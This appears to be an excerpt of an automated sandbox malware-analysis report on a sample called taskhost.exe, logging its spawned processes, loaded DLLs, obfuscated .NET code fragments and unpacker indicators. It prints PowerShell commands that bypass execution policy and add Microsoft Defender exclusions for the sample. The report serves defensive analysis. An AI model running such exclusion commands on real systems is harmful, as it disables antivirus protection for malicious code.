              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\taskhost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhost.exe'Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: taskhost.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: taskhost.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{sEFvf3apOKFrWiDqQQ2als0gAqTnCKWBh7tmgqnLrABeMQP9360ACBkmbM03Ec0wzW8lxVEcdi6O.PC5D3AH6tuXRotu8IH0RnzqU14sMCJIEiBeqij5WolE1gqquRDeAiEwLJbNcSvoog6ZAltqQMpaC,sEFvf3apOKFrWiDqQQ2als0gAqTnCKWBh7tmgqnLrABeMQP9360ACBkmbM03Ec0wzW8lxVEcdi6O.buw4ivSAb3VNgV9p349EFpL0gCHe6RbBewKZcREY3YjmKmT62Q4gYl6nKomu8JaTME1yHWmOQuh5,sEFvf3apOKFrWiDqQQ2als0gAqTnCKWBh7tmgqnLrABeMQP9360ACBkmbM03Ec0wzW8lxVEcdi6O.uJShferxaWFgJZzbUKy,sEFvf3apOKFrWiDqQQ2als0gAqTnCKWBh7tmgqnLrABeMQP9360ACBkmbM03Ec0wzW8lxVEcdi6O.FzTkTdS1S1vDpbQETHA,iN2F6NEn5nlUN46FY0x.qRrXbbBYsCZGZM6BTD0()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{_5sTQSKTYXFyiEuPTdmR[2],iN2F6NEn5nlUN46FY0x.kC4NXYtx6gAapb25M0YXRtcJwNQcqiNQcaIXyxW0z5ZLD6Fql1a(iN2F6NEn5nlUN46FY0x.HdIP7B2vXlxGQRAxqcy(_5sTQSKTYXFyiEuPTdmR[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { _5sTQSKTYXFyiEuPTdmR[2] }}, (string[])null, (Type[])null, (bool[])null, true)
              .NET source code contains potential unpacker
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: z3vMjvLlI7N8qJTx34R System.AppDomain.Load(byte[])
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: FGUF8oXp0910CRBIyZG System.AppDomain.Load(byte[])
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.cs.Net Code: FGUF8oXp0910CRBIyZG
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC7BD2A5 pushad ; iretd 8_2_00007FFAAC7BD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC8D5CD3 push ebp; ret 8_2_00007FFAAC8D5D02
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC8D6CC3 pushfd ; ret 8_2_00007FFAAC8D6CD2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC8D00BD pushad ; iretd 8_2_00007FFAAC8D00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC8D5C83 push edx; ret 8_2_00007FFAAC8D5CA2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC8D5825 push ss; ret 8_2_00007FFAAC8D583A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC9A2316 push 8B485F95h; iretd 8_2_00007FFAAC9A231B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC7ED2A5 pushad ; iretd 12_2_00007FFAAC7ED2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC9011F8 push E95C1A05h; ret 12_2_00007FFAAC901239
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC9D2316 push 8B485F92h; iretd 12_2_00007FFAAC9D231B
              Source: taskhost.exe, sEFvf3apOKFrWiDqQQ2als0gAqTnCKWBh7tmgqnLrABeMQP9360ACBkmbM03Ec0wzW8lxVEcdi6O.csHigh entropy of concatenated method names: 'HNKgoSqfXDFgAAomY5qKW6LSxMQAKzYyQImj', 'JKHT84pzNR2DnfbveVUQGAzry0dzKSTj1r1K', 'Rjj22TeF3yp3c8hikXWX8KI9JsQQbNBHFGzz', 'UWHi1BwSgwYkPs5nBFEVFsMnaSqlvGAd7o9C'
              Source: taskhost.exe, OqDiOCdcmoNNeF3Lng5g13fL2390VDKQss8cbI5uuO1mptBsgW9.csHigh entropy of concatenated method names: 'ifT55Pl4YooBFVBuMQUsvqd9cz5dodP0er6jG0klcqeLznmVPH6', 'nS4lJLwJWuYrlTNJuSNWGX7klfEva4Ug2D2L1GBXEJiQIudZRnN', 'vhFwAnwZcqaad0YKjzppAy7IcRapfRPauwObixT6YJcLjEWTyjC', '_6X2lkcmBbCA', 'mE52r1rux93', 'LCyVRKzTgBr', 'N8IQuFTB0bb', 'nkUI1Sugef1', 'eKrWWwLC5NS', 'buP8z7BEGT3'
              Source: taskhost.exe, s7aLsrPQnfoFRxAZGIeX1EsSxoOonLrIoQYNbnkvux36CXVya6wFudOXeeYKdMMqtxEyrsx9rgQb.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'hzRgDzLJB4imgOWXNCH3uvEdzpTjYmjmCaLE', 'bo0VwdbIZ9TyISQbhcmOnChtYpmS3Alzg4RR', '_2jn607Dvwbex3CDqQ0PKNkzWqC3tKTU2m7BI', 'UbLRPOAgmVHxM98qzG4mHuvjcYMqy3XljuPo'
              Source: taskhost.exe, iN2F6NEn5nlUN46FY0x.csHigh entropy of concatenated method names: 'lFEzpPGs6abWTkcRyVJ', 'fSzKJKB533zjRFJRlDG', 'HqZeA3eIFOV9J0oL9cq', 'satU8AmmlebvtiZGYIS', 'RksP8oUmHkEgd7qQ1JE', 'kbrnJQY7I83iltSgAEx', 'ENhPvHmIhnvDHvbBrso', 'DuAwFO0stKS1dZgQnL9', 'uQcDCv49ewCCg5ypeFM', 'HdIP7B2vXlxGQRAxqcy'
              Source: taskhost.exe, VpjB0nPRwGHi6IjtbgB.csHigh entropy of concatenated method names: 'o2U0oSHAwkKnZ8K0IGJ', 'Gxl5yZYcuPScTXjyO8y', 'tsrKDX8E5j01b9rnIj8', '_5JaYwpN4HZQyw5HbZa0IVuweDK13fVVPjzmH5EAYtoXCANA9a8cpr756iRI4zIZs0yas', 'jtHZJQPTAdqqE8S1PhG3Jmow7iPfHOfG6rU9R5JZoMONUN8PgHzapkKsav5INIsLu3so', 'JtMWevypgV5miUK8Wxe3wxViJTZOFFvy0lO5rEtd2OIRwVxqfZ3sFn2oo40XwAr1LfNC', 'sqr6CGijo2UdiqX6rDMJMH742QRMbnNr75bFGUJHgCk7fSCHgdIHu82FeKhlfKT7LLWL', 'nvZLkCQryAbVcXNMP0uwlUV0eMUtNNYwmEB4oWtZzj7pVoipzNiCGitSWZS4buyEc3tP', 'tGqDHxpOOLNqnP0qqXPZo7gmaaY0KoPUwPZEUUydZi5xyGNBlJ2Wf5AgG0s3Gi49fZ81', 'sX7hbNvBhaBfptapK8MLVyKHlbz4hBGRj0yzueV49EXRegaGChb0QjcJnNKd5fUVfM0b'
              Source: taskhost.exe, kXNV4l1kbGO7mIIf8tC.csHigh entropy of concatenated method names: 'QJDLIojFbJ9XSi4NGq1', 'thj6nBWagYd1jm0dXse7pqZP7HEPxigUD1Do', 'B01YQJBousC62xH9occDmOx0ftd0SnXHUHeh', 'D4pTkswiKSscBBxcZnZwWltBNPDYcGkyMl0t', 'iv8PcqxZKo7WCYuss0m4cz66dsW0uIXHXvql'
              Source: taskhost.exe, C27zjw0Ge3o2Fhymu20.csHigh entropy of concatenated method names: 'ncr50XK6P6vIKBgBYUa', 'z3vMjvLlI7N8qJTx34R', 'AMzTL83ttqO4ZdgGV6p', 'Dy9tPqtO2UbiDgOq0Dy', 'FGuQmIqHcZHUW3brVlP', 'FsC5B7v16qhD5nVUO4v', 'vPzdW2e4TKfiX2DnRTp', 'LgRKRzCT9c9f9rKVtyB', '_1t9p89zaqoRxKQ7OamR', '_73VShCOEmFwzp6UqElB'
              Source: taskhost.exe, qFETamjqJa2miE31ri1.csHigh entropy of concatenated method names: 'lQiIh6BLc7tSlUluaSA', 'PyTdpnR6k7m7yjLKgZN', 'CWZACpvUc2h261lOyIN', 'NIwJJXtlIwfGMml2Rto', '_0CqqjfA0mWNBmVEyTWQ', 'wEYjQ6nJ9c6oyOZKlDT', 'ZPNORz244Ye1oRuLdET', 'pIRI5QHfL8bpXupNQdo', 'MOhfx7vZ4QwA6Tlcyg9', '_4hIgkUjE0BXivV2AhnI'
              Source: taskhost.exe, pS1f3L7Tm54SySzhRUj.csHigh entropy of concatenated method names: 'QUqP4d8otfu9HWNpBls', '_6LuSEAEISBwLu0RLWIh', 'eUabJsvqAk9609BoQ0a', 'eNWYEqvhyx9wb8hZYxF', 'kpJPoYvpokte3M8mHAU', 'LjL1wy1h0pGPiSgb9t3', 'JNuWoH2GRO3mmTSnUrD', 'DGNl25PpNFuWoY2UbNJ', 'ShaDzlQ53EOwZQrT67N', '_7pO5RvGBbPGfE9iiDqj'
              Source: taskhost.exe, OuHtkL8kTukB8RkZJZG.csHigh entropy of concatenated method names: 'JaR5dLVpdVP7zgWwLGb', 'ffktV4PwEO0w1g7g7hy', 'enGisRQN8pBd0ND09m9', 'CovhPbfX2lRv2FWc62w', 'enMkmqGaO1wWTSaCcAi', '_96McAlIo4dPCMozE2S0', 'TmFtWDuJh6U9jMRPQ9s', 'huZhpejjlbxj21jPTZH', 'SE1B5WSMWArLijSKjId', '_5hTOVtTiIZJhkq2J9DS'

              Hooking and other Techniques for Hiding and Protection

              barindex
              Loading BitLocker PowerShell Module
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
